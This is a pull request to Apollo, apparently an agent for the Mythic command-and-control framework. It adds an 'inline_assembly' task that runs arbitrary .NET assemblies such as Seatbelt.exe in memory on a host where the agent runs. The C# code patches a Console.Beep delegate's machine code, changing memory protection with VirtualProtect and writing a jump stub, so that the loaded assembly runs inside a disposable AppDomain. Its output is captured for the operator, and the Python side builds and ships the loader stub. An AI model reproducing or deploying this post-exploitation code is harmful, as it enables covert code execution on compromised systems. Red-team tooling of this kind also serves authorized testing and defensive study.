### PR TITLE
Added inline_assembly Task (Apollo v2)

### DIFF
--- a/Payload_Type/apollo/agent_code/Tasks/Tasks.csproj
+++ b/Payload_Type/apollo/agent_code/Tasks/Tasks.csproj
@@ -66,6 +66,7 @@
     <Compile Include="exit.cs" />
     <Compile Include="getprivs.cs" />
     <Compile Include="get_injection_techniques.cs" />
+    <Compile Include="inline_assembly.cs" />
     <Compile Include="jobkill.cs" />
     <Compile Include="jobs.cs" />
     <Compile Include="keylog_inject.cs" />

--- a/Payload_Type/apollo/agent_code/Tasks/inline_assembly.cs
+++ b/Payload_Type/apollo/agent_code/Tasks/inline_assembly.cs
@@ -1,0 +1,284 @@
+﻿#define COMMAND_NAME_UPPER
+
+#if DEBUG
+#define INLINE_ASSEMBLY
+#endif
+
+#if INLINE_ASSEMBLY
+
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using ApolloInterop.Classes;
+using ApolloInterop.Interfaces;
+using ApolloInterop.Structs.MythicStructs;
+using System.Runtime.Serialization;
+using ApolloInterop.Serializers;
+using System.Threading;
+using System.IO;
+using System.Collections.Concurrent;
+using System.IO.Pipes;
+using ApolloInterop.Structs.ApolloStructs;
+using ApolloInterop.Classes.Core;
+using ApolloInterop.Classes.Collections;
+using ApolloInterop.Utils;
+using System.Runtime.InteropServices;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+
+namespace Tasks
+{
+    public class inline_assembly : Tasking
+    {
+        [DataContract]
+        internal struct InlineAssemblyParameters
+        {
+            [DataMember(Name = "pipe_name")]
+            public string PipeName;
+            [DataMember(Name = "assembly_name")]
+            public string AssemblyName;
+            [DataMember(Name = "assembly_arguments")]
+            public string AssemblyArguments;
+            [DataMember(Name = "loader_stub_id")]
+            public string LoaderStubId;
+        }
+
+        [DllImport("kernel32")]
+        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
+
+        private AutoResetEvent _senderEvent = new AutoResetEvent(false);
+        private ConcurrentQueue<byte[]> _senderQueue = new ConcurrentQueue<byte[]>();
+        private JsonSerializer _serializer = new JsonSerializer();
+        private AutoResetEvent _complete = new AutoResetEvent(false);
+        private Action<object> _sendAction;
+
+        private Action<object> _flushMessages;
+        private ThreadSafeList<string> _assemblyOutput = new ThreadSafeList<string>();
+
+
+        private bool _completed = false;
+        public string[] SplitCommandLine(string commandLine)
+        {
+            bool inQuotes = false;
+
+            string cmdline = commandLine.Trim();
+            List<string> cmds = new List<string>();
+            string curCmd = "";
+            for (int i = 0; i < cmdline.Length; i++)
+            {
+                char c = cmdline[i];
+                if (c == '\"' || c == '\'')
+                    inQuotes = !inQuotes;
+                if (!inQuotes && c == ' ')
+                {
+                    cmds.Add(curCmd);
+                    curCmd = "";
+                }
+                else
+                {
+                    curCmd += c;
+                }
+            }
+            if (!string.IsNullOrEmpty(curCmd))
+                cmds.Add(curCmd);
+            string[] results = cmds.ToArray();
+            for (int i = 0; i < results.Length; i++)
+            {
+                if (results[i].Length > 2)
+                {
+                    if (results[i][0] == '\"' && results[i][results[i].Length - 1] == '\"')
+                        results[i] = results[i].Substring(1, results[i].Length - 2);
+                    else if (results[i][0] == '\'' && results[i][results[i].Length - 1] == '\'')
+                        results[i] = results[i].Substring(1, results[i].Length - 1);
+                }
+            }
+            return results;
+        }
+        public inline_assembly(IAgent agent, Task task) : base(agent, task)
+        {
+        }
+
+        public static string loadAppDomainModule(String[] sParams, Byte[] bMod)
+        {
+            string result = "";
+            var bytes = bMod;
+            AppDomain isolationDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString());
+            isolationDomain.SetData("str", sParams);
+            bool default_domain = AppDomain.CurrentDomain.IsDefaultAppDomain();
+            try
+            {
+                isolationDomain.Load(bMod);
+            }
+            catch { }
+            var Sleeve = new CrossAppDomainDelegate(Console.Beep);
+            var Ace = new CrossAppDomainDelegate(ActivateLoader);
+
+            RuntimeHelpers.PrepareDelegate(Sleeve);
+            RuntimeHelpers.PrepareDelegate(Ace);
+
+
+            var flags = BindingFlags.Instance | BindingFlags.NonPublic;
+            var codeSleeve = (IntPtr)Sleeve.GetType().GetField("_methodPtrAux", flags).GetValue(Sleeve);
+            var codeAce = (IntPtr)Ace.GetType().GetField("_methodPtrAux", flags).GetValue(Ace);
+
+            int[] patch = new int[3];
+
+            patch[0] = 10;
+            patch[1] = 11;
+            patch[2] = 12;
+
+            uint oldprotect = 0;
+            VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), 0x4, out oldprotect);
+            Marshal.WriteByte(codeSleeve, 0x48);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, 1), 0xb8);
+            Marshal.WriteIntPtr(IntPtr.Add(codeSleeve, 2), codeAce);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[0]), 0xff);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[1]), 0xe0);
+            VirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), oldprotect, out oldprotect);
+            try
+            {
+                isolationDomain.DoCallBack(Sleeve);
+            }
+            catch (Exception ex)
+            {
+            }
+            string str = isolationDomain.GetData("str") as string;
+            result = str;
+            unloadAppDomain(isolationDomain);
+            return result;
+        }
+
+        static void ActivateLoader()
+        {
+            string[] str = AppDomain.CurrentDomain.GetData("str") as string[];
+            string output = "";
+            foreach (var asm in AppDomain.CurrentDomain.GetAssemblies())
+            {
+                if (!asm.FullName.Contains("mscor"))
+                {
+                    TextWriter realStdOut = Console.Out;
+                    TextWriter realStdErr = Console.Error;
+                    TextWriter stdOutWriter = new StringWriter();
+                    TextWriter stdErrWriter = new StringWriter();
+                    Console.SetOut(stdOutWriter);
+                    Console.SetError(stdErrWriter);
+                    var result = asm.EntryPoint.Invoke(null, new object[] { str });
+
+                    Console.Out.Flush();
+                    Console.Error.Flush();
+                    Console.SetOut(realStdOut);
+                    Console.SetError(realStdErr);
+
+                    output = stdOutWriter.ToString();
+                    output += stdErrWriter.ToString();
+                }
+            }
+            AppDomain.CurrentDomain.SetData("str", output);
+
+        }
+
+        public static void unloadAppDomain(AppDomain oDomain)
+        {
+            AppDomain.Unload(oDomain);
+        }
+
+        public override void Kill()
+        {
+            _completed = true;
+            _cancellationToken.Cancel();
+            _complete.Set();
+        }
+
+        public override System.Threading.Tasks.Task CreateTasking()
+        {
+            return new System.Threading.Tasks.Task(() =>
+            {
+                TaskResponse resp;
+                Process proc = null;
+                try
+                {
+                    InlineAssemblyParameters parameters = _jsonSerializer.Deserialize<InlineAssemblyParameters>(_data.Parameters);
+                    if (string.IsNullOrEmpty(parameters.LoaderStubId) ||
+                        string.IsNullOrEmpty(parameters.AssemblyName))
+                    {
+                        resp = CreateTaskResponse(
+                            $"One or more required arguments was not provided.",
+                            true,
+                            "error");
+                    }
+                    else
+                    {
+                        if (_agent.GetFileManager().GetFileFromStore(parameters.AssemblyName, out byte[] assemblyBytes))
+                        {
+                            if (_agent.GetFileManager().GetFile(_cancellationToken.Token, _data.ID, parameters.LoaderStubId, out byte[] exeAsmPic))
+                            {
+                                byte[] ByteData = assemblyBytes;
+                                string[] StringData = SplitCommandLine(parameters.AssemblyArguments);
+
+                                string output = "";
+                                output = loadAppDomainModule(StringData, ByteData);
+                                if (!string.IsNullOrEmpty(output))
+                                {
+                                    _agent.GetTaskManager().AddTaskResponseToQueue(
+                                        CreateTaskResponse(
+                                            output,
+                                            true,
+                                            ""));
+                                }
+                            }
+                            else
+                            {
+                                resp = CreateTaskResponse(
+                                    $"Failed to download assembly loader stub (with id: {parameters.LoaderStubId})",
+                                    true,
+                                    "error");
+                            }
+                        }
+                        else
+                        {
+                            resp = CreateTaskResponse($"{parameters.AssemblyName} is not loaded (have you registered it?)", true);
+                        }
+                    }
+                }
+                catch (Exception ex)
+                {
+                    resp = CreateTaskResponse($"Unexpected error: {ex.Message}\n\n{ex.StackTrace}", true, "error");
+                }
+            }, _cancellationToken.Token);
+        }
+
+        private void Client_Disconnect(object sender, NamedPipeMessageArgs e)
+        {
+            e.Pipe.Close();
+            _completed = true;
+            _cancellationToken.Cancel();
+            _complete.Set();
+        }
+
+        private void Client_ConnectionEstablished(object sender, NamedPipeMessageArgs e)
+        {
+            System.Threading.Tasks.Task.Factory.StartNew(_sendAction, e.Pipe, _cancellationToken.Token);
+            System.Threading.Tasks.Task.Factory.StartNew(_flushMessages, _cancellationToken.Token);
+        }
+
+        public void OnAsyncMessageSent(IAsyncResult result)
+        {
+            PipeStream pipe = (PipeStream)result.AsyncState;
+            // Potentially delete this since theoretically the sender Task does everything
+            if (pipe.IsConnected && !_cancellationToken.IsCancellationRequested && _senderQueue.TryDequeue(out byte[] data))
+            {
+                pipe.EndWrite(result);
+                pipe.BeginWrite(data, 0, data.Length, OnAsyncMessageSent, pipe);
+            }
+        }
+
+        private void Client_MessageReceived(object sender, NamedPipeMessageArgs e)
+        {
+            IPCData d = e.Data;
+            string msg = Encoding.UTF8.GetString(d.Data.Take(d.DataLength).ToArray());
+            _assemblyOutput.Add(msg);
+        }
+    }
+}
+#endif

--- a/Payload_Type/apollo/agent_code/Tasks/inline_assembly.cs
+++ b/Payload_Type/apollo/agent_code/Tasks/inline_assembly.cs
@@ -198,6 +198,7 @@ namespace Tasks
                 Process proc = null;
                 try
                 {
+                    _agent.AcquireOutputLock();
                     InlineAssemblyParameters parameters = _jsonSerializer.Deserialize<InlineAssemblyParameters>(_data.Parameters);
                     if (string.IsNullOrEmpty(parameters.LoaderStubId) ||
                         string.IsNullOrEmpty(parameters.AssemblyName))
@@ -244,6 +245,10 @@ namespace Tasks
                 catch (Exception ex)
                 {
                     resp = CreateTaskResponse($"Unexpected error: {ex.Message}\n\n{ex.StackTrace}", true, "error");
+                }
+                finally
+                {
+                    _agent.ReleaseOutputLock();
                 }
             }, _cancellationToken.Token);
         }

--- a/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
+++ b/Payload_Type/apollo/mythic/agent_functions/inline_assembly.py
@@ -1,0 +1,121 @@
+from mythic_payloadtype_container.MythicCommandBase import *
+import json
+from uuid import uuid4
+from sRDI import ShellcodeRDI
+from mythic_payloadtype_container.MythicRPC import *
+from os import path
+import base64
+import tempfile
+from distutils.dir_util import copy_tree
+import shutil
+
+EXEECUTE_ASSEMBLY_PATH = "/srv/ExecuteAssembly.exe"
+
+class InlineAssemblyArguments(TaskArguments):
+
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = [
+            CommandParameter(
+                name="assembly_name",
+                cli_name = "Assembly",
+                display_name = "Assembly",
+                type=ParameterType.ChooseOne,
+                dynamic_query_function=self.get_files,
+                description="Assembly to execute (e.g., Seatbelt.exe).",),
+            CommandParameter(
+                name="assembly_arguments",
+                cli_name="Arguments",
+                display_name="Arguments",
+                type=ParameterType.String,
+                description="Arguments to pass to the assembly.",
+                parameter_group_info = [
+                    ParameterGroupInfo(
+                        required=False,
+                        group_name="Default",
+                    ),
+                ]),
+        ]
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise Exception("Require an assembly to execute.\n\tUsage: {}".format(InlineAssemblyCommand.help_cmd))
+        if self.command_line[0] == "{":
+            self.load_args_from_json_string(self.command_line)
+        else:
+            parts = self.command_line.split(" ", maxsplit=1)
+            self.add_arg("assembly_name", parts[0])
+            self.add_arg("assembly_arguments", "")
+            if len(parts) == 2:
+                self.add_arg("assembly_arguments", parts[1])
+
+    async def get_files(self, callback: dict):
+        file_resp = await MythicRPC().execute("get_file", callback_id=callback["id"],
+                                              limit_by_callback=True,
+                                              get_contents=False,
+                                              filename="",
+                                              max_results=-1)
+        if file_resp.status == MythicRPCStatus.Success:
+            file_names = []
+            for f in file_resp.response:
+                if f["filename"] not in file_names and f["filename"].endswith(".exe"):
+                    file_names.append(f["filename"])
+            return file_names
+        else:
+            return []
+
+
+class InlineAssemblyCommand(CommandBase):
+    cmd = "inline_assembly"
+    needs_admin = False
+    help_cmd = "inline_assembly [Assembly.exe] [args]"
+    description = "Executes a .NET assembly with the specified arguments in a disposable AppDomain. This assembly must first be known by the agent using the `register_assembly` command."
+    version = 2
+    is_exit = False
+    is_file_browse = False
+    is_process_list = False
+    is_download_file = False
+    is_upload_file = False
+    is_remove_file = False
+    author = "@thiagomayllart"
+    argument_class = InlineAssemblyArguments
+    attackmapping = ["T1547"]
+
+    async def build_exeasm(self):
+        global EXEECUTE_ASSEMBLY_PATH
+        agent_build_path = tempfile.TemporaryDirectory()
+        outputPath = "{}/ExecuteAssembly/bin/Release/ExecuteAssembly.exe".format(agent_build_path.name)
+        copy_tree(self.agent_code_path, agent_build_path.name)
+        shell_cmd = "rm -rf packages/*; nuget restore -NoCache -Force; msbuild -p:Configuration=Release {}/ExecuteAssembly/ExecuteAssembly.csproj".format(agent_build_path.name)
+        proc = await asyncio.create_subprocess_shell(shell_cmd, stdout=asyncio.subprocess.PIPE,
+                                                         stderr=asyncio.subprocess.PIPE, cwd=agent_build_path.name)
+        stdout, stderr = await proc.communicate()
+        if not path.exists(outputPath):
+            raise Exception("Failed to build ExecuteAssembly.exe:\n{}".format(stderr.decode()))
+        shutil.copy(outputPath, EXEECUTE_ASSEMBLY_PATH)
+
+    async def create_tasking(self, task: MythicTask) -> MythicTask:
+        global EXEECUTE_ASSEMBLY_PATH
+        if not path.exists(EXEECUTE_ASSEMBLY_PATH):
+            # create
+            await self.build_exeasm()
+        #dllPath = path.join(self.agent_code_path, "AssemblyLoader_{}.dll".format(task.callback.architecture))
+        dllBytes = open(EXEECUTE_ASSEMBLY_PATH, 'rb').read()
+        file_resp = await MythicRPC().execute("create_file",
+                                              task_id=task.id,
+                                              file=base64.b64encode(dllBytes).decode(),
+                                              delete_after_fetch=True)
+        if file_resp.status == MythicStatus.Success:
+            task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
+        else:
+            raise Exception("Failed to register inline-assembly DLL: " + file_resp.error)
+
+        task.display_params = "-Assembly {} -Arguments {}".format(
+            task.args.get_arg("assembly_name"),
+            task.args.get_arg("assembly_arguments")
+        )
+
+        return task
+
+    async def process_response(self, response: AgentResponse):
+        pass


### PR DESCRIPTION
Hi!

This is similar to the previous pull request: https://github.com/MythicAgents/Apollo/pull/56

I've tried to follow the design patterns of Apollo v2. This pull request adds the inline_assembly task and also modifies the way the assemblies are stored and retrieved by assembly_inject, execute_assembly and execute_pe by using DPAPI keys to decrypt the in-memory assemblies.

